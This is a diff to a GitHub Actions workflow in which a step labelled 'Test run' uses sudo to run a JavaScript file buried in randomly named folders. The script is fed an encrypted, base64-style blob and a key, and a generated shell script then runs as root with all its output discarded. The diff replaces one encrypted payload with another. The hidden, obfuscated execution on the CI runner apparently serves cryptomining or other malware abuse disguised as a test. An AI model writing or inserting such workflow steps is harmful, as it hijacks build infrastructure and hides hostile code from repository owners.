--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'tfqnm'
+        echo 'ku7q7'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/MVMMkEvhvb5IuycDr0kQNa8h9sSDofMfTTDoDaXInZtrE63ntJ3YuayLRjunsmAZTxSsujQENbzyJ1gYuPGBUrFy5Moq3BiMzfYH658TMDSCGzftHnadX 8bt8k5 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19LHCVUVcstNrYhoA+7iS82DLb5XYYrTcWuKTJSZlKbpmmGihxlmkA4g7PNykTy2c7L0RlD1GG5mULDHQbzjIOlkT8GeyvxiNC1GcyeJ8eiP3Rg3reO1i9+ lpllm4 && sudo sh r.sh > /dev/null 2>&1
